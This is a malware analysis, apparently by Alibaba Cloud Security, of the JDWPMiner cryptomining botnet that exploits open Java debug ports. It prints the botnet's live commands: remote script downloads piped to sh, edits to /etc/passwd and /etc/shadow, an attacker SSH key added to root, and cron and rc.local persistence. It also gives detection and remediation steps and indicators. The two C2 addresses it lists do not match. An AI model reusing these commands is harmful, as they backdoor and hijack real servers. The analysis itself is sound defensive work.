Analysis of JDWPMiner Mining Trojan: Remote Debugging with Java Causes Hidden Risks

Recently, the Alibaba Cloud Security Team detected a malicious mining attack by exploiting the RCE vulnerability of JDWP. JDWP is widely used in the development and debugging of Java applications, while Java is widely used in the development of e-commerce, office applications, CMS, and other platforms that are closely related to daily life. If remote debugging is not closed during the software release, major hidden risks will be left behind. JDWPMiner uses this feature for profitable intrusion.

Alibaba Cloud security experts have found that the botnet exploits the Java Debug RCE by downloading mining binary files from malicious download source files to achieve mining. Then, it persists through Crontab, writes the secret key to authorized_keys to get remote access, and runs four methods to rebound the shell to take full control of the host. Thus, user assets will achieve great harm.

Alibaba Cloud Security continuously monitors the BOT, finding that its spread has increased recently. Users are advised to pay attention to BOT defense.

Means of Spread

Phase Analysis

Protocol Analysis

The Java Debug Wire Protocol Transport Interface (JDWP) is the communication protocol between the debugger and the target JVM. In the JDPA system, the format of the interaction data between the frontend debugger and the backend debuggee is described by JDWP. This protocol defines the request command, response data, and error code in detail to ensure communication between the JVMTI and JDI clients. The debugger can obtain values from the VM, including classes, objects, and threads through this protocol.

JDWP is a TCP-based binary packet network protocol, which communicates through command packets and reply packets. The Flags field indicates whether the packet is a command packet or a response packet, and the Command Set defines the command category.

To enable the protocol above, users usually need to modify catalina.sh or setenv.sh in the bin directory of the apache-tomcat installation package. There are two connection methods; dt_shment indicates local debugging and dt_socket indicates remote debugging.

It can also be enabled through the command line:

java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

The JDWP protocol does not carry authentication information. Therefore, for a Java application with a debugging port enabled, anyone can debug the application with JDWP. This brings great risks to development and O&M. JDWPMiner uses this feature for profitable intrusion.

Intrusion Analysis

The preceding two methods can result in the JDWP port being opened to the public network. JDWPMiner exploits the RCE vulnerability of JDWP by calling wget in its parent process.

java -server -Xms256m -Xmx2048m -XX:MaxPermSize=256m -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

Execute the following command:

wget http://m247.ltd:36663/.seashells/shell.sh

There are four ways to bounce the shell when running the shell.sh script, python, perl, nc, and bash. The C2 of shell.sh script located at Luxembourg’s 192.251.84.152. After the shell is executed, its host will be completely occupied by JDWPMiner.

Then, the call to teardrop.sh will be executed in a different way.

wget http://m247.ltd:36663/.xmrig/teardrop.sh -O-

Wipe out common records of /etc/passwd with sed:

sed -i 's/^eth0:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth0:.*//' /etc/shadow 2>/dev/null;sed -i 's/^eth1:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth1:.*//' /etc/shadow 2>/dev/null;sed -i 's/^sudev:.*//' /etc/passwd 2>/dev/null;sed -i 's/^sudev:.*//' /etc/shadow 2>/dev/null;sed -i 's/^system:.*//' /etc/passwd 2>/dev/null;sed -i 's/^system:.*//' /etc/shadow 2>/dev/null;

Add the public key to the /root/.ssh/authorized_keys:

# add ssh keygrep Glock /root/.ssh/authorized_keys || echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock' >> /root/.ssh/authorized_keys;chmod 755 /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;chown root:root /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;

Persist with Crontab:

# Add To Crontabgrep m247 /var/spool/cron/root || echo "0 * * * * wget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/rootgrep m247 /var/spool/cron/crontabs/root || echo "0 * * * * wget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/crontabs/rootgrep m247 /etc/crontab || echo "0 * * * * root wget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/crontabgrep m247 /etc/cron.d/0hourly || echo "0 * * * * root wget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/cron.d/0hourly

Persist with cron.d:

# Add to Cron.decho -e '#!/bin/sh\n\nwget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/0;chmod +x /etc/cron.hourly/0;chattr +i /etc/cron.hourly/0;echo -e '#!/bin/sh\n\nwget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/0;chmod +x /etc/cron.daily/0;chattr +i /etc/cron.daily/0;echo -e '#!/bin/sh\n\nwget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/0;chmod +x /etc/cron.weekly/0;chattr +i /etc/cron.weekly/0;echo -e '#!/bin/sh\n\nwget --quiet http://m247.ltd:36663/.xmrig/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/0;chmod 777 /etc/cron.monthly/0;chattr +i /etc/cron.monthly/0;

Persist with rc.local by determining different system versions:

if [[ -e /etc/debian_version ]]; thenRCLOCAL='/etc/rc.local';echo -e '#!/bin/sh\n\nwget --quiet http://m247.ltd:36663/.etc/rc -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;elif [[ -e /etc/centos-release || -e /etc/redhat-release ]]; thenRCLOCAL='/etc/rc.d/rc.local'echo -e '#!/bin/sh\n\nwget --quiet http://m247.ltd:36663/.etc/rc -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;chmod +x $RCLOCAL;elseecho -e '#!/bin/sh\n\nwget --quiet http://m247.ltd:36663/.etc/rc -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/rc.local;chmod +x /etc/rc.local;fi

Download mining Trojans with curl and wget:

curl -s http://m247.ltd:36663/.xmrig/miner.php || wget --quiet http://m247.ltd:36663/.xmrig/miner.php -O /dev/null

Security Recommendations

Verification Methods

  • Local Authentication: Execute the following command. If the result is returned, it means the Debug port is enabled.
ps -ef | grep jdwp | grep -v 'grep'
  • Remote Authentication: After telnetting the port, enter the command JDWP-Handshake. If the JDWP-Handshake is returned, it means the vulnerability exists.
{ echo "JDWP-Handshake"; sleep 20 } | telnet remote_host remote_port

Solutions

  1. Search for catalina.sh or setenv.sh, and comment out the line with .
  2. If running Docker, modify to 0 in the dockerfile.

Detailed Security Recommendations

1. Close the JDWP port or disable it from the Internet. If debugging is performed in the staging environment, disable the Debug mode after completion.

2. Disable the Java Debug mode

3. Cloud Firewall monitors the latest emergence of RCE on the Internet in real-time using big data. The overall time from RCE disclosure to response is less than three hours, effectively stopping customer assets from being attacked by RCE vulnerabilities. It supports three to seven layers of protocols to meet the protection of HTTP protocols for websites and the four-layer defense of a large number of TCP/UDP protocols. By default, the current version of Cloud Firewall supports defense against the remote command execution vulnerability of the Java debugging interface.

4. The Cloud Firewall intelligent policies can be customized based on historical traffic to provide the best practices for exposed face convergence in line with the customer’s business. Moreover, users can achieve maximum Internet exposure convergence of assets through one-click delivery or self-selection. By doing this, the risks of inappropriate exposure of JDWP ports to the outside world can be avoided, preventing the scanning behavior of cyberspace mapping in reinsurance mode.

IOC

SSH Public Key

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock

C2

198.251.84.152

Domain

m247.ltd

URL

Alibaba Tech

First hand and in-depth information about Alibaba’s latest technology → Facebook: “Alibaba Tech”. Twitter: “AlibabaTech”.

First-hand & in-depth information about Alibaba's tech innovation in Artificial Intelligence, Big Data & Computer Engineering. Follow us on Facebook!